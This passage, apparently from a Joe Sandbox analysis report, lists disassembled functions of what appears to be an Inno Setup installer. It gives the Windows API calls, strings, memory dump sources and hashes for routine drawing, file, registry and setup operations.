• CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000), ref: 00496DD8
  • Part of subcall function 00453D30: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
• DestroyWindow.USER32(?,00496DFB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00496DF4,?,?,000000FC,004964A8,00000000,STATIC), ref: 00496DEE
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$File$CloseCreateHandle$AttributesCopyDestroyLongMultipleObjectsPrivateProfileStringWaitWrite
                                                                                                                                        • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                                                                                                                        • API String ID: 1549857992-2312673372
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E441
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0042E447
• RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,0042E51D,?,00000000,0047E6DC,00000000), ref: 0042E495
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressCloseHandleModuleProc
• String ID: .DEFAULT\Control Panel\International$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$Locale$QaE$kernel32.dll
• API String ID: 4190037839-2312295185
APIs
• GetActiveWindow.USER32 ref: 004629FC
• GetModuleHandleA.KERNEL32(user32.dll), ref: 00462A10
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 00462A1D
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00462A2A
• GetWindowRect.USER32(?,00000000), ref: 00462A76
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 00462AB4
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
APIs
• GetActiveWindow.USER32 ref: 0042F194
• GetModuleHandleA.KERNEL32(user32.dll), ref: 0042F1A8
• GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 0042F1B5
• GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 0042F1C2
• GetWindowRect.USER32(?,00000000), ref: 0042F20E
• SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D), ref: 0042F24C
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Window$AddressProc$ActiveHandleModuleRect
• String ID: ($GetMonitorInfoA$MonitorFromWindow$user32.dll
• API String ID: 2610873146-3407710046
APIs
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00458DFB,?,00000000,00458E5E,?,?,021D3858,00000000), ref: 00458C79
• TransactNamedPipe.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CD6
• GetLastError.KERNEL32(?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000,00000001,00000000,00000000,00000000,00458DFB), ref: 00458CE3
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 00458D2F
• GetOverlappedResult.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000), ref: 00458D55
• GetLastError.KERNEL32(?,?,00000000,00000001,00458D69,?,-00000020,0000000C,-00004034,00000014,021D3858,?,00000000,00458D90,?,00000000), ref: 00458D5C
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ErrorLast$CreateEventMultipleNamedObjectsOverlappedPipeResultTransactWait
• String ID: CreateEvent$TransactNamedPipe
• API String ID: 2182916169-3012584893
APIs
• GetModuleHandleA.KERNEL32(OLEAUT32.DLL,UnRegisterTypeLib,00000000,00456E85,?,?,00000031,?), ref: 00456D48
• GetProcAddress.KERNEL32(00000000,OLEAUT32.DLL), ref: 00456D4E
• LoadTypeLib.OLEAUT32(00000000,?), ref: 00456D9B
  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressErrorHandleLastLoadModuleProcType
• String ID: GetProcAddress$ITypeLib::GetLibAttr$LoadTypeLib$OLEAUT32.DLL$UnRegisterTypeLib$UnRegisterTypeLib
• API String ID: 1914119943-2711329623
APIs
• RectVisible.GDI32(?,?), ref: 00416E13
• SaveDC.GDI32(?), ref: 00416E27
• IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00416E4A
• RestoreDC.GDI32(?,?), ref: 00416E65
• CreateSolidBrush.GDI32(00000000), ref: 00416EE5
• FrameRect.USER32(?,?,?), ref: 00416F18
• DeleteObject.GDI32(?), ref: 00416F22
• CreateSolidBrush.GDI32(00000000), ref: 00416F32
• FrameRect.USER32(?,?,?), ref: 00416F65
• DeleteObject.GDI32(?), ref: 00416F6F
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
• String ID:
• API String ID: 375863564-0
APIs
• CreateFileA.KERNEL32(00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B46
• GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B6A
• SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000,00000003,00000080,00000000), ref: 00404B86
• ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000002,00000000), ref: 00404BA7
• SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00404BD0
• SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00404BDA
• GetStdHandle.KERNEL32(000000F5), ref: 00404BFA
• GetFileType.KERNEL32(?,000000F5), ref: 00404C11
• CloseHandle.KERNEL32(?,?,000000F5), ref: 00404C2C
• GetLastError.KERNEL32(000000F5), ref: 00404C46
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
• String ID:
• API String ID: 1694776339-0
APIs
• GetSystemMenu.USER32(00000000,00000000), ref: 00422233
• DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00422251
• DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042225E
• DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 0042226B
• DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00422278
• DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00422285
• DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00422292
• DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 0042229F
• EnableMenuItem.USER32(00000000,0000F020,00000001), ref: 004222BD
• EnableMenuItem.USER32(00000000,0000F030,00000001), ref: 004222D9
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Menu$Delete$EnableItem$System
• String ID:
• API String ID: 3985193851-0
APIs
• FreeLibrary.KERNEL32(10000000), ref: 00481A11
• FreeLibrary.KERNEL32(00000000), ref: 00481A25
• SendNotifyMessageA.USER32(00010438,00000496,00002710,00000000), ref: 00481A97
Strings
• GetCustomSetupExitCode, xrefs: 004818B1
• Not restarting Windows because Setup is being run from the debugger., xrefs: 00481A46
• Restarting Windows., xrefs: 00481A72
• Deinitializing Setup., xrefs: 00481872
• DeinitializeSetup, xrefs: 0048190D
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: FreeLibrary$MessageNotifySend
• String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
• API String ID: 3817813901-1884538726
APIs
• SHGetMalloc.SHELL32(?), ref: 004616C7
• GetActiveWindow.USER32 ref: 0046172B
• CoInitialize.OLE32(00000000), ref: 0046173F
• SHBrowseForFolder.SHELL32(?), ref: 00461756
• CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
• SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
• SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
• String ID: A
• API String ID: 2684663990-3554254475
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
  • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
  • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
• SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
• RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
• String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
• API String ID: 884541143-1710247218
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                        • API String ID: 190572456-3516654456
                                                                                                                                        • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                                        • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                                                        • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                                        • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                                                        APIs
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                                                        • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                                                        • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$StretchText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2984075790-0
                                                                                                                                        • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                                        • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                                                        • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                                        • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDirectoryHandleSystem
                                                                                                                                        • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                        • API String ID: 2051275411-1862435767
                                                                                                                                        • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                                        • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                                                        • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                                        • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                                                        APIs
                                                                                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                                                        • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1005981011-0
                                                                                                                                        • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                        • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                                                        • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                        • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                                                        APIs
                                                                                                                                        • GetFocus.USER32 ref: 0041B745
                                                                                                                                        • GetDC.USER32(?), ref: 0041B751
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                                        • String ID: %H
                                                                                                                                        • API String ID: 3275473261-1959103961
                                                                                                                                        • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                                        • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                                                        • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                                        • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                                                        APIs
                                                                                                                                        • GetFocus.USER32 ref: 0041BA17
                                                                                                                                        • GetDC.USER32(?), ref: 0041BA23
